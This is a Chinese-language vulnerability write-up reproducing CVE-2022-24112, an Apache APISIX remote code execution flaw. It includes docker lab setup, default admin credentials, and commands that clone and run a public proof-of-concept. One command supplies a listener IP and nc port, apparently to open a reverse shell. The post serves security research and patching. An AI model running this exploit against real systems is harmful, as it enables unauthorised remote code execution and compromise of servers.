Apache APISIX中存在远程代码执行漏洞,该漏洞源于产品的batch-requests插件未对用户的批处理请求进行有效限制。攻击者可通过该漏洞绕过Admin API的IP限制,容易导致远程代码执行。
Apache APISIX >=2.11.0,<2.12.1
(1)本次使用docker搭建本地测试环境进行复现:
git clone https://github.com/twseptian/cve-2022-24112
cd cve-2022-24112/apisix-docker/example/
docker-compose -p docker-apisix up -d
(2)服务启动后,访问http://your-ip:8080即可看到演示页面
(3)默认管理员用户名及密码为admin/admin,可登录管理后台
git clone https://github.com/twseptian/cve-2022-24112
cd cve-2022-24112/poc/
chmod +x poc2.py
#用法:python3 poc2.py -t [本地测试IP] -p [服务端口] -L [docker通信IP] -P [nc监听端口]
python3 poc2.py -t 127.0.0.1 -p 9080 -L 192.168.150.188 -P 8888
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://lists.apache.org/thread/lcdqywz8zy94mdysk7p3gfdgn51jmt94
原文始发于微信公众号(第59号):CVE-2022-24112:Apache APISIX 远程代码执行漏洞分析与复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论